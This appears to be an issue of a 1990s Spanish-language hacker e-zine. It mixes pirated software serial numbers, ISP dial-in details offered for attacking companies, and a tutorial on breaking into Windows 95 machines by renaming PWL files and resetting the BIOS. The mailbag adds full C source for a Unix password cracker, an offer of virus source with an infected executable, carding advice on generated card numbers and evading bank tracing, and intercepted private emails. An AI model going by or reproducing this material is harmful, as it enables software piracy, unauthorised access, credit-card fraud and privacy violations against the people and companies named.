---------------- User Name: emilio carrion Serial Number: 0HUE668CCJ8BBLTDNKM0 ------------------ end ------------------- Upgrade HD Pro 16 v1 --> HD Pro 3 (for Win95) ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0RFFKFZX0VU494ZNALM0 ------------------ end ------------------- Upgrade HD Pro 16 v2 --> HD Pro 3 (for Win95) ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 05YWKJFMQB0R1XY2PMYM ------------------ end ------------------- Upgrade HD Std 32 --> HD Pro 3 (for Win95) ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0HQTBW1935AY8DARB358 ------------------ end ------------------- Weenie - Wierd Faces Graficos animados ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 08MYPT2FMKUFL1CNBYD9 ------------------ end ------------------- Egor 3 poderosa aplicacion para crear applets java ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0M64BBWTVLKEBE9U0CC2 ------------------ end ------------------- HotDog Professional 3 (for Windows95) Uno de los mejores editores de HTML ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0FDYL11D6F82BH65HR70 ------------------ end ------------------- Los programas piden el codigo de registro que debera ser copiado usando COPY -- PASTE en el cuadro que el programa lo indique incluyendo TODO lo que esta entre las lineas cut here y end incluyendo el espacio en blanco. Codigo adicional sin costo extra! Neobook Professional: 1251418CKNHPOI --> raregazz, su editor o cualquiera de sus colaboradores no se hacen responsables del uso y publicacion de estos codigos asi como de la manera en que estos hayan sido obtenidos. No existe forma alguna de saber quien los envio (lo hicieron usando remailers) y cualquier problema con estos codigos NO debera ser tratado con nosotros. Todos estos codigos estan probados y si funcionan. Por favor no email preguntando como funcionan o como se usan estos programas. >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< TTTTTTTTTTTTTTT TTTTTTTTTTTTTTT XXX XXX TTT XXX XXX TTT UU UU CCCCCC AA NNNN NN XXX XXX TTT UU UU CC AA AA NN NN NN XXXX TTT UU UU CC AAAAAAA NN NN NN XXX XXX TTT UU UU CC AA AA NN NNNN XXX XXX TTT UUUUUUU CCCCCC AA AA NN NNN XXX XXX Que ondas es la primera vez que mando algo a la revista y espero les sirva. Ahi les van algunos numeros, scripts y servidores a todos los compas que leen la revista y quieren intentar hackear a alguna compañia esto les puede servir: **************************************************************************** Datos de Compunet: Prestadora del servicio: compunet.com.mx Nombre de la cuenta: ?????? Password: ?????? PRIMARY DNS: 207.248.192.11 SECONDARY: 207.248.192.12 POP SERVER: 207.248.197.6 SMTP SERVER: 207.248.197.6 NNTP SERVER: 207.248.197.6 Telefonos de acceso: 76-25-10 , 76-27-25 , 77-10-24 , 77-09-80 , 77-34-08 , 77-34-09 , 77-16-57 , 77-16-34 . [ una vez dentro de este sistema solamente se presentan algunos directorios y no aparece el directorio /etc por lo que a primera vista parece ser un "servidor seguro" ] **************************************************************************** Datos de Telnor: Prestadora del servicio: telnor.net Nombre de la cuenta: ?????? Password: ?????? PRIMARY DNS: 200.23.249.1 SECONDARY: 200.23.248.1 SMTP: email.telnor.net { parece que cambio por dns.telnor.net } [ uhh?? ] Gateway: 200.23.249.3 Netmask: 255.255.255.0 Telefono de acceso: 76-33-01 [ Notas: servicio llleeeennnntttttiiiisssssiiiiimmmmmooooo y la mayoria de las veces esta ocupado el numero telefonico. ¿alguien tiene el passwd? ] **************************************************************************** Datos de Cetys: Prestadora del servicio: orca.ens.cetys.mx Nombre de la cuenta: ?????? Password: ?????? Aqui es necesario usar trumpet winsock y obtener los datos de una cuenta. [ been there, done that! ] Lo siguiente es el login.cmd y bye.cmd necesarios para conectarte a traves de internet cetys. { solo lo que esta entre asteriscos }. Donde dice username y password debes de poner el nombre de la cuenta y el password respectivamente. -------------------------------login.cmd-------------------------------------- **************************************************************************** # Multiple number redial script Sample for Trumpet Winsock # Written by TucanX (TucanX@gratismail.com) # Modificado para cetys universidad, campus ensenada por # TucanX (TucanX@gratismail.com) # Definiciones $access1 = "745300" $access2 = "745301" $username = "???????" $password = "???????" $pppcomand = "ppp" $id_prompt = "!login: " $pw_prompt = "Password:" $srvc_prompt = "bye]:" $online_prompt = "tun" $addr_leadin = "Your IP address is " %access_nums = 4 %busy_limit = 3 %bad_limit = 3 %total = %busy_limit + %access_nums %tries = 0 %busy = 0 %bad = 0 %pass = 0 %reset = 0 $goodbye = "no" $reset = "atz" $init = "ats11=55s7=35" $access = $access1 #deshabilite la siguiente linea si desea ver el resultado de los #comandos en el puerto de comunicaciones echo off #presentacion display "Script de acceso PPP v3.0" \n display "Cetys universidad, Campus Ensenada" \n display "Programado por TucanX (TucanX@gratismail.com)" \n display "En base a codigo por TucanX (TucanX@gratismail.com)" \n display "Gracias a Raretrip y la revista RareGaZz" \n display " Adios" sleep 3 #Obtener Username y Password. Estos seran enviados al servidor al #conectarse query $username "Teclee su nombre de usuario en orca" password "Teclee el password para su cuenta en orca" #Proceso de entrada con varios Modems repeat if ! %reset display \n"Inicializando el modem... " \n output $reset\r input 30 OK\n output $init\r input 30 OK\n %reset = 1 end if %access_nums > 1 & $access = "bad" %loops = 0 repeat %pass = %pass + 1 if %pass = 1 $access = $access2 end if %pass = %access_nums $access = $access1 %pass = 0 end %loops = %loops +1 if %loops > %access_nums $goodbye = "No se encontraron numeros libres - abortando..." end until $access <> "bad" | $goodbye <> "no" end if %tries = %total + 3 $goodbye = "\n Se alcanzo el limite de reintentos - abortando...\n " end if $goodbye <> "no" display \n$goodbye\7\n display \n"Por favor intente de nuevo mas tarde." display \n\n"Script de enlace Cetys universidad, Campus ensenada."\n display "Programado por TucanX en base a codigo"\n display "por TucanX."\n display \n"gracias por usar este servicio..."\n output +++\r output ath0\r abort end $goodbye = "no" %connect = 0 %tries = %tries + 1 display \n"Intento #"%tries\n sleep 1 display \n"Marcando..."\n display $access \n outputecho atdt $access\r $modem = "" while $modem = "" %dummy = [read 35 $modem] end $result = copy($modem, 1, 10) if $result = "BUSY" %bad = %bad + 1 if %access_nums > 1 if $access = $access1 $access1 = "bad" end if $access = $access2 $access2 = "bad" end if %bad = %access_nums $goodbye = "No se encontraron lineas libres - Abortando..." else display \n"La lφnea" $access "se encuentra ocupada."\n $access = "bad" %reset = 0 end else if %bad > %bad_limit - 1 $goodbye = "Se alcanzo el limite de NO CARRIER - abortando..." else %reset = 0 end end end $result = copy($modem, 1, 4) if $result = "NO CARRIER" %busy = %busy + 1 if %busy = %busy_limit $goodbye = " No se encontraron numeros libres - abortando... " end end $result = copy($modem, 1, 7) if $result = "CONNECT" | $result = "CARRIER" # wait 30 dcd display "Servidor orca PPP... acceso logrado. " \n display "EN LINEA... iniciando protocolo de entrada..." \n output \13 %connect = 1 end if $modem <> "NO CARRIER" & $modem <> "BUSY" & %connect = 0 display \n"Evento no esperado - reintentando..."\n end # log current attempt data to .ini file $section = "current" save %tries $section save %busy $section save %bad $section save $modem $section until %connect # Una vez lograda la coneccion, script para login, password y protocolo # Identificacion de usuario (login:) input 30 $id_prompt output $username\13 display \n"Mandando identificacion de usuario..." \n # Clave de acceso (password:) input 30 $pw_prompt display \n"Mandando password... "\n output $password\13 # Opcion de menu PPP input 30 $srvc_prompt display \n"Inicializando protocolo..."\n output $pppcomand\13 display " EN LINEA... puede lanzar ahora sus aplicaciones de Internet" \n display " para cerrar la coneccion seleccione DIALLER/BYE " \n # Espera a que el proceso este listo # input 30 $online_prompt # Read the IP number # online # display \n"Negociando direccion IP..."\n # address 30 # input 30 \n # $addr_leadin # display \n" En linea... Tu direccion IP es \i \n **************************************************************************** ----------------------------------bye.cmd------------------------------------- **************************************************************************** display \n"cancelando..."\n # echo off set dtr off sleep 1 set dtr on if ![input 2 \n] output +++ if [input 3 OK\n] display \n\n"Script de enlace Cetys universidad, Campus ensenada."\n display "Programado por TucanX en base a codigo"\n display "por TucanX."\n display \n"gracias por usar este servicio..."\n output ath0\r end end **************************************************************************** Telefono de acceso: 74-53-00 , 74-53-01 **************************************************************************** Datos de Red Tecnologica Nacional (RTN): Prestadora del servicio: rtn.net.mx Nombre de la cuenta: ?????? Password: ?????? PRIMARY DNS: ???????????? SECONDARY: ???????????? SMTP: rtn.net.mx Gateway: 200.34.68.254 <-- Supuestamente un BackBone de MCI Netmask: ????????????? Telefono de acceso: 5283939 **************************************************************************** Espero y esto los ayude para cualquier comentario escribir a: tucanx@gratismail.com >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ┌───────────────────────────────────────────────────────────────────────────┐ │ COMO CRACKER CUALQUIER SISTEMA BASADO EN WINDOWS 95 │ ├───────────────────────────────────────────────────────────────────────────┤ │ Por: Guybrush │ ├───────────────────────────────────────────────────────────────────────────┤ │ E-Mail: guybrush@axis.org │ └───────────────────────────────────────────────────────────────────────────┘ ┌───────────────────────────────────────────────────────────────────────────┐ │ INDICE │ └───────────────────────────────────────────────────────────────────────────┘ 0-Introduccion 1-¿Por que no sirve el Windows 95 como sistema multiusuario? 2-¿Es facil cracker el Windows 95? 2.1-Como hacerlo 2.2-Nos lo ponen algo dificil 2.3-Saltando todas las barreras 3-Despedida ┌───────────────────────────────────────────────────────────────────────────┐ │ 0-INTRODUCCION │ └───────────────────────────────────────────────────────────────────────────┘ Hay muchos articulos que hablan sobre Unix, Internet y otros temas ya muy vistos (como mi anterior articulo, que espero que hayas leido) :) Para variar un poco os voy a hablar del famoso y polemico 'Windows 95'. Vereis que se pueden hacer algunas cosas con el (cuando no se cuelga) X-DDD ┌───────────────────────────────────────────────────────────────────────────┐ │ 1-¿POR QUE NO SIRVE EL WINDOWS 95 COMO SISTEMA MULTIUSURIO? │ └───────────────────────────────────────────────────────────────────────────┘ Los que venis de Windows 3.x habreis notado una gran mejora tanto en el entorno como en la multitarea. La verdad es que el Windows 3.x no tenia multitarea, asi que esto es algo que se agradece bastante en el Windows 95. Pero sigue estando el problema de que el nucleo del Windows es el indestruc- tible MS-DOS. Si, no conseguimos librarnos de el. Por problemas de compatibi- lidad de programas, tanto Windows 3.x como Windows 95 estan funcionando bajo MS-DOS (aunque el 95 lo disimule bien - parece como si el S.O. fuera el Win 95 y el MS-DOS solamente un sub-shell). Dejando aparte que el Windows 95 aun deja mucho que desear (a pesar de la mul- tatarea y de las 'multiples' veces que chafa nuestras 'tareas' quedandose col- gado), tiene el inconveniente de que sus creadores no deben de saber aun lo que es un sistema operativo 'multiusuario' porque nosotros podemos crear todos los usuarios que queramos, cada uno con sus contraseñas y sus entornos, pero todos ellos son SUPERUSUARIOS, por lo que cada uno de ellos tiene acceso a todo el disco duro, lo que quiere decir que puede ver, modificar, ejecurar o borrar ficheros que no son suyos. Por tanto, si tienes 'cuenta' en un ordenador con sistema Windows 95, ya eres el superusuario. ¡Demasiado facil!. :) ┌───────────────────────────────────────────────────────────────────────────┐ │ 2-¿ES FACIL CRACKEAR EL WINDOWS 95? │ └───────────────────────────────────────────────────────────────────────────┘ Ya hemos visto antes que teniendo cuenta, si. Pero ¿que ocurre si no tenemos cuenta?. Mas claramente para los que aun siguan despistadillos. ¿Que pasa si encendemos un ordenador, se arranza el Windows 95 y luego nos pide un login y un password? ¿Como accedemos a ese ordenador? ┌────────────────┐ │2.1-COMO HACERLO│ └────────────────┘ Si estas habituado a usar Windows 95 te habras dado cuenta de que cuando apa- rece el mensaje de 'Iniciando Windows 95' podemos pulsar la tecla F8 tras la cual nos aparece un menu. Bien, como hemos visto que no tenemos acceso al or- denador, reseteamos y estamos atentos para pulsar esta tecla al ver el mensa- je. ¿Ya esta? Ahora elegimos la opcion 6 que es la de acceder al simbolo del sistema. Ahora entramos en el directorio de Windows y renombramos todos los archivos cuya extension es '.PWL' que son los archivos de los usuarios con sus claves correspondientes. Por ejemplo: 'ren *.pwl *.guy'. Ahora volvemos a re- setear y cuando se arranque Windows nos pedira que introduzcamos un nombre de usuario y una contraseña para este. Como hemos (aparentemente) eliminado los ficheros PWL, Windows no encuentra ningun usuario y nos pide que creemos uno nuevo (como ocurre cuando lo instalamos). Despues de cotillear, borrar, o lo que quieras hacer, borra el fichero nuevo que se ha creado con extension PWL, correspondiente al nuevo usuario que has creado y vuelve a renombrar los fi- cheros anteriores (para que no se den cuenta del cambio). En este caso: 'ren *.guy *.pwl'. ┌─────────────────────────────┐ │2.2-NOS LO PONEN ALGO DIFICIL│ └─────────────────────────────┘ ¿Que ocurriria si al arrancar Windows pulsaramos F8 y no pasara nada? ¿Esta estropeada la tecla F8? No, no es eso. Lo que ocurre es que ese menu que ofre- ce Windows puede desactivarse. Pero antes de deciros como se activa os dire que podeis tambien arrancar con un disco llave y una vez que hallais accedido en modo MS-DOS, repetis el procedimiento anterior: entrar en el directorio Windows, renombrar ficheros, etc. Luego sacais el disco y reseteais. Para volver a poner los ficheros como estaban se hace exactamente lo mismo. Aunque no es necesario, os dire como activar/desactivar el menu F8. Para ello teneis que modificar el fichero msdos.sys (el que no domine el MS-DOS mejor que haga una copia antes de este fichero). Supongo que el que este leyendo esto es lo bastante listo como para saber que ese fichero es oculto y solo de lectura. Uhmmmm ¿no sabes como editarlo y modificarlo? Usa el attrib (si eres tan lamer como para no saber usarlo, aprende antes MS-DOS). Bueno, debajo de donde pone [Options] debes añadir BootKeys=0 para desactivar el menu de inicio. Para activarlo dale el valor 1, o simplemente elimina esa linea. ┌───────────────────────────────┐ │2.2-SALTANDO TODAS LAS BARRERAS│ └───────────────────────────────┘ Mas dificil todavia. ¿Y si esta el menu de inicio desactivado? Recurrimos a arrancar con un disco llave. Pero ¿que ocurriria si la BIOS esta configurada para que primero lea la unidad C y luego la A (osea que no se puede arrancar desde disquete)? Lo primero que haria cualquiera (por lo menos yo) es entrar en la configuracion de la BIOS y modificar esta opcion para que arranque pri- mero desde la unidad A. Pero ... ¡sorpresa! ¡tiene contraseña!. Debemos saltar esta contraseña si queremos acceder a ese disco duro. Aunque hay algunas BIOS faciles de crackear (simplemente ejecutando un pequeño programa te dice cual es la contraseña) en este caso no lo podemos hacer ya que este programa no lo podriamos ejecutar (ni desde el disco duro ni desde la disquetera). Solo nos queda una solucion (un poco arriesgada, pero ... el que algo quiere algo le cuesta). Abrimos el ordenador y desconectamos los 2 cables que sumi- nistran corriente a la placa base. Cuando los volvamos a conectar, la BIOS es- tara configurada por defecto y, por supuesto, sin contraseña. ┌───────────────────────────────────────────────────────────────────────────┐ │ 8-DESPEDIDA │ └───────────────────────────────────────────────────────────────────────────┘ Esto es todo por hoy. espero que te halla servido de ayuda y que me escribas si tienes alguna duda. Tambien me gustaria que me corrigierais si es que me he confundido en algo. Un saludo. >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< B O O M E R A N G ^~^~^~^~^~^~^~^~^ "Tu linea de comunicacion segura con el underground" Mail Boy...RareTrip Ultimamente se habia vuelto esta seccion 'no tan segura' por que empezaron a aparecer las firmas de las personas que nos escribian por un error de la persona que le tocaba hacer esta seccion el numero pasado. Ya no se preocupen, de ahora en adelante su nombre o handle no volvera a aparecer en esta seccion a menos que ustedes especifiquen lo contrario. Las preguntas que aqui aparecen son solamente las que le puedan interesar a otras personas y no todos los mensajes que recibimos. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ !!URGENTE!! Muchos colaboradores que publican su direccion de correo en esta revista se ven atacados por individuos que aun no identificamos. Estas personas se hacen pasar por nosotros y dan instrucciones para ejecutar virus o cosas asi. Nosotros *nunca* enviaremos a ningun lector o colaborador un archivo, si tenemos que hacerles llegar algun ejecutable lo pondremos en la pagina web. Para todos aquellos que recibieron mail pidiendo que se comunicaran con nosotros a otras direcciones no hagan caso! Las unicas direcciones que pueden usar para escribirnos es raregazz@bigfoot.com para alcanzar a todos los que ayudan a la revista o a raretrip@cyberdude.com por si tienes algun mensaje personal hacia mi. Solo confien mensajes de nosotros cuando sean respuestas a mensajes suyos o esten firmados con nuestra *nueva* llave pgp. La firma debera ser verificada usando la llave que esta en nuestra pagina web. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Ustedes como parte de la revista tienen que decidir que hacer con esta situacion, recuerdan el "log-in" de nuestra pagina donde les pedimos sus datos entre los que estan su ciudad ?? pues muchos forms nos llegan de la misma ciudad y a lo mejor ni se conocen por lo que vamos a tratar de crear grupos de minorias en cada ciudad del mundo con las personas que participen en este plan piloto. Si nos mandan los datos que les pedimos abajo, nosotros vamos a hacerla de 'busca parejas' y cuando dos o mas personas nos manden sus datos y coincida la ciudad entonces les avisamos a todos los de la misma ciudad y les damos las direcciones de correo electronico para que se pongan de acuerdo entre ustedes si se quieren conocer...que opinan? To: RareGaZz@Bigfoot.com Subject: HACKERZ (en mayusculas y con zeta) -----------------------------------------------------------> Nombre: Ciudad: Estado: Edad: Grado de estudios: Email: El proposito es crear grupos de aficionados a las redes y pc's que luego con el tiempo y experiencia puedan pasar a formar parte de los grupos de hackers de habla español y asi expandir la cultura hacker a todos los horizontes posibles. Tambien les seria util a todos para hacer el clasico intercambio de software, passwords y muchas otras cosas. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ seria bueno que publicaran el codigo fuente del virus Zhengxi... [ El codigo nos lo enviaron (V0V_77) y esta en el archivo incluido con esta revista ZHENGXI.ZIP junto con un ejecutable que ya viene infectado. Hasta ahora ningun antivirus detecta el ejecutable infectado asi que manejenlo con cuidado. Otra cosa, el codigo del virus y el archivo infectado fueron conseguidos de la revista española (en ingles) 29A que la pueden encontrar en http://29a.islatortuga.com/ ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ ATENCION TODOS LOS USUARIOS DE PGP 2.6.2 Internacional: Cuando ejecuten el comando: pgp -kg para generar sus llaves pgp tienen 3 opciones: Pick your RSA key size: 1) 384 bits- Casual grade, fast but less secure 2) 512 bits- Commercial grade, medium speed, good security 3) 1024 bits- Military grade, very slow, highest security Choose 1, 2, or 3, or enter desired number of bits: 2048 ~~~~ La opcion mas segura es 2048 pero no aparece en el menu de la version internacional de Pretty Good Privacy. Si tu copia de PGP no dice RSA sino RSAREF solo puedes escoger 1024 bits como maximo para tu llave. La nueva llave de RareGaZz es de 2048 para aumentar la seguridad de ustedes y la nuestra. Si quieren conseguir las versiones internacionales de PGP en la seccion de WareZ de nuestra revista podran encontrar las 2 versiones actualmente disponibles (32 bits y 16 bits). A todos los que bajaron su copia de PGP de nuestra pagina pueden seguir usandola para encriptar y decriptar mensajes para las llaves de 2048 bits. Si quieres conseguir un shell para PGP en Windows o una version PGP para Macintosh, FreeBSD o cualquier otro sistema visita la pagina internacional de PGP en: http://www.ifi.uio.no/pgp/ Ahi esta el link para bajar el programa INAS (Is not a Shell) para Windows 95 que no necesita la version DOS para funcionar. Si les interesa tambien pueden conseguir el codigo fuente de PGP. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ ¿ que tipo de riesgos crea el uso de numeros de tarjetas no autorizadas ? [ Primero que nada necesitas saber DONDE usar el numero que tengas. -Si vas a una tienda de software en internet nunca piden tan solo el numero de tarjeta, te piden nombre de usuario y algunas veces su direccion! El programa que esta en nuestra seccion de warez (Credit Master v4.0) es unicamente para crear numeros verdaderos pero eso no quiere decir que la tarjeta exista. El programa usa los algoritmos de las distintas compañias y es util en algunas paginas porno que solo permiten la entrada a mayores de edad (comprueban esto pidiendo un numero de tarjeta que pueda ser comprobado como verdadero por los algoritmos de las tarjetas). -Hay un lugar, creo que es www.rubberchicken.com donde mandan bromas a domicilio y hay que pagar tan solo con el numero de tarjeta y fecha de expiracion -en especial unas tarjetas de broma- lo que hace facil el ser compradas usando un programa generador de numeros validos. La fecha de expiracion es una de dos, par o impar, asi que solo hay dos intentos. ahora viene lo legal (y tedioso) del asunto... hacer esto SI implica fraude bancario, despues de todo estas obteniendo software que cuesta dinero y eso alguien tiene que pagarlo. seguramente no sera el dueño de la tarjeta pero tampoco la compañia que lo vendio, por lo que si el banco que expiro esa tarjeta puede llegar a rastrear esa compra estate seguro que lo hara (y lo hacen). --> pero cuando nos a detenido algo que sea ilegal? <-- prevencion de paranoia Ahora que si hiciste la compra cuidadosamente y usando los consejos que dimos en la revista tu conciencia debe estar tranquila. Si por equivocacion recibiste el "producto" usando tu nick borra toda huella de el que pueda llevar a alguien investigandolo a tu verdadera identidad. Por ejemplo, si recibiste el producto por email a una cuenta de bigfoot ni creas que es anonima la direccion destino! en cuanto un banco pida autorizacion para revisar registros de esas direcciones...BANG you go down. Lo mismo en hotmail y en todos los servicios en linea. si usaste una cuenta en hotmail asegurate de no volverla a usar. si quieres volver a hacerlo con exito por el momento crea una cuenta en www.gratismail.com y desde que la registres hasta que termines de usarla para obtener el "producto" usa el www.anonymizer.com (recomiendo que te lleves toda la info a una universidad o centro de computo publico y desde ahi hagas todo el show). las precauciones son importantes por que si no cuando quieras pasar un dia alegre en compañia de...digamos una amiga no podras estar seguro pensando que en cualquier momento podrian llegar los perjudiciales a tu casa tumbando la puerta pistola en mano... jeh :-) ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ ustedes dijeron en algun numero anterior varios trucos para evadir la seguridad en windows 95 y aqui les tengo otro que aprendi de chiripa : Renombra el archivo c:\windows\logos.sys a cualquier cosa y 1 de cada 25 veces que termines una sesion de windows desde el menu inicio saldras al prompt DOS... [ Este hack fue probado y comprobado en varias computadoras y seguramente les servira a todos los que usen windows 95 en el trabajo. Lo malo es que eso de 1 de cada 25 no es cierto, bien podria ser 1 de 50... ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ ¿ Que ondas con eso de "el gran hermano te esta vigilando" que esta en las paginas de hackers por todos lados (Big Brother) ? [ La linea "Big Brother is watching you" es usada en la mayoria de las paginas de hackers aunque la mayoria no sabe ni que diablos significa. Como en raregazz nos jactamos de saberlo (o averiguarlo) todo >:-> les vamos a dar una pequeña catedra -aun gratuita- sobre lo que significa ese slogan y el origen... -ahi pa'que no digan los de la SEP- -=1984=- George Orwells escribio un libro llamado 1984 donde describia una sociedad donde no existia la privacidad ni la libertad del pensamiento (semejanzas?). Existia en esa civilizacion (o deberia decir imbecivilizacion) el jefe supremo que era llamado "El gran hermano". En esa sociedad existia si no me equivoco, una "policia del pensamiento" que se encargaba de regular a todos los rebeldes de la epoca. Una vez capturados los 'insurgentes' eran llevados a campos de tortura donde los hacian quedar como vegetales por el resto de sus dias (lease escuelas y academias). El estado controlaba y vigilaba por medio de unas pantallas que deberian estar en cada casa y lugar de reuniones (ahora se conocen como televisores) y a diferencia de las que nosotros conocemos, estas permitian ver al Estado que es lo que hacian las personas del otro lado de la pantalla (un poco como el email no crees?). Cada dia eran reglamentarios los "tres minutos de odio" en la telepantalla que hacian lo que el futbol en estos dias... Si quieres saber como termina un hombre y una mujer libres de pensamiento (el hombre no es Zimmerman) que decidieron ir en contra de un Gobierno Totalitario, Despota, Fascista, Armamentista y anti-democratico (lo siento Fujimori pero no es su gobierno, hablaremos de cobardes y traidores en otro numero :-) no dejes de checar este libro y conocer aun mejor la cultura hacker y su lema "Libertad de Informacion y Pensamiento". 1984 Por George Orwells ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Nombre del codigo: TC.C Para Compilar: gcc -O2 tc.c -o tc Descripcion: Programa que tiene la basica funcion de crackear los passwords en un sistema UNIX usando el campo geko, logins y una lista de palabras standard. .............................................................................. */ #include <stdio.h> #include <string.h> #define fetch(a,b,c,d) {fgets(a,130,b); c=strtok(a,":"); d=strtok('\0',":");} main() { FILE *p,*o,*w; char i[50],pes[130],pas[50],pps[50],pws[50]; char *es=pes,*as=pas,*ps=pps,*ws=pws; printf("\nTinyCrack v1.0 Bluesman 1/95 - RaGE Mag Release!\n\n"); printf("Password File: "); gets(i); p=fopen(i,"r"); printf("WordList File: "); gets(i); w=fopen(i,"r"); printf("Results File : "); gets(i); o=fopen(i,"w"); fprintf(o,"*** TINYCRACK v1.0 ***\n\n*** PASS 1: NULL PASSWORDS ***\n"); while(ps) { fetch(es,p,as,ps); if(ps) if(ps[-1]==':') fprintf(o,"| User [%s] has no password!\n",as); } fflush(o); rewind(p); fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n"); do { fetch(es,p,as,ps); if(ps) if(!strcmp((char *)crypt(as,ps),ps)) fprintf(o,"| User [%s] has password [%s]\n",as,as); } while(ps); fflush(o); rewind(p); fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n"); do { rewind(w); fetch(es,p,as,ps); do { fgets(ws,130,w); ws[strlen(ws)-1]=0; if(!strcmp((char *)crypt(ws,ps),ps)) { fprintf(o,"| User [%s] has password [%s]\n",as,ws); fflush(o); break; } } while(!feof(w)); } while(!feof(p)); fprintf(o,"*** FINISHED SESSION ***\n"); exit(1); } .............................................................................. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ rared00dz: aqui les envio algunos de los mensajes que hemos interceptado de servidores mexicanos que son totalmente inservibles para nosotros pero resultan comicos o interesantes... -|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| > Unos chistes: > > 1) Esta Pedrito en la clase de historia y le preguntan: > A ver Pedrito quien descubrio America? > - No lo se , señorita................ > muy mal , Pedrito, muy mal......bueno hay alguien quien lo sepa? > > Entonces se levanta un japones que habia en la clase y contesta: > Colon, honorable señolita........ > Al momento se oye una voz que dice: > MALDITOS JAPONESES!!!!! > > la señorita muy enfadada pregunta: > Quien dijo eso????? > Pedrito se levanta y responde: > General Mc Arthur,1945......... > > > 2) Mama,mama en el colegio me han llamado mafioso. > -Bueno hijo ya ire yo mañana a arreglar eso. > -Bueno mama, pero que parezca un accidente................. > > 3) Esto es un misionero que esta en plena selva y se encuentra de bruces > con un leon que estaba casi muerto de hambre . El misionero se asusta y se > pone de rodillas, empezando a rezar dice: > Padre infunde a este pobre leon sentimientos cristianos...... > Se oye un silencio y de buenas a primeras el leon se pone de rodillas, > diciendo: Padre, bendice estos alimentos que voy a recibir............. > > > 4) Que pena......no puedo usar windows........mi gato se ha comido el > raton....... > > 5) Sabes como dejas intrigado a un cerdo? > -Mañana te digo....... > > 6) Entre dos locos: > A ver si adivinas lo que tengo en la mano? > Un elefante.... > no vale!! Me has visto......... > > 7) Nunca me olvidare la ultima frase de mi padre.....: > Paco no muevas el > andamioooooooooooooooooooooooooooooooooooooo.............. > > 8) un empleado a su jefe: > Si no puede usted aumentarme el sueldo.....porque no me lo da mas a > menudo???? > > Ah y la nueva frase que he acu±ado : > No es lo que pasa.....sino como pasas,lo que pasa > > {{{ }}} Montse (en lenguaje cibernetico es un abrazo) -|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| Que onda?, Aqui les mando un mail que, si saben Unix, les va a gustar... Bye.... .....McLeod HOW THE WORLD WAS CREATED...BY COMPUTER _____________________________________________________________ IN THE BEGINING (To justify God's ways to the 21st century) In the begining was the computer. And God took a sit in front of it and this is what happened : #************************************ #* Welcome to SimUniverse Computers * #************************************ #Please Enter your login name : God #password : omniscient # #login or password incorrect , try again #password : omnipotent #login ok.. entering system And God signed on 12:01 a.m., Sunday, March 1. $ Let there be light! # Unrecognizable command. Try again! $ Create light # Done. $ Create heaven # Done. $ Create earth # Please wait... terraforming... calculating... Done. $ Run heaven and earth # Done. And God created Day and Night. An God saw there were 0 errors. And God signed off at 12:02 a.m., Sunday, March 1. # Approx. funds remaining: $92.50. And God signed on at 12:00 a.m., Monday, March 2. $ Let there be firmament in the midstm of the water and # Unrecognizable command. Try again! $ Create firmament # Done. $ Run firmament # Done. And God divided the waters. And God saw there were 0 errors. And God signed off 12:02 a.m., Monday, March 2. # Approx. funds remaining: $84.60. And God signed on at 12:00 a.m., Tuesday, March 3. $ Let the waters under heaven be gathered together unto one place and let the dry land appear and # Too many characters in string especification! Try again! $ Run dryland # Done. And God created Earth and Seas. And God saw there were 0 errors. And God signed off 12:01 a.m., Tuesday, March 3. # Approx. funds remaining: $65.00. And God signed on at 12:00 a.m., Wednesday, March 4. $ Create lights in the firmament to divide the day fron the night # Unspecified type. Try again! $ Create sunmoonstars # Done.. And God created Sun, Moon, Stars. And God saw there were 0 errors. And God signed off 12:01 a.m., Wednesday, March 4. # Approx. funds remaining: $54.00. And God signed on at 12:00 a.m., Thursday, March 5. $ Create fish # Done. $ Create fowl # Done. $ Run fish'nfowl # Done. And God created the great seamonsters and every living creature that creepeth wherewith the waters swarmed after its kind and every winged fowl after its kind. and He saw there were 0 errors. And God signed off 12:01 a.m., Thursday, March 5. # Approx. funds remaining: $45.60. And God signed on at 12:00 a.m., Friday, March 6. $ Create cattle # Done. $ Create creepy things # Done. $ Now let us make man in our image # Unspecified type! Try again! $ Create man # Done. $ Be fruitful and multiply and replenish the earth and subdue it and have dominion over the fish of the sea and over the fowl of the air and over every living thing that creepeth upon the earth # Too many command operands! Try again! $ Run multiplication # Execution terminated. 6 errors. $ Insert breath # Done. $ Run multiplication # 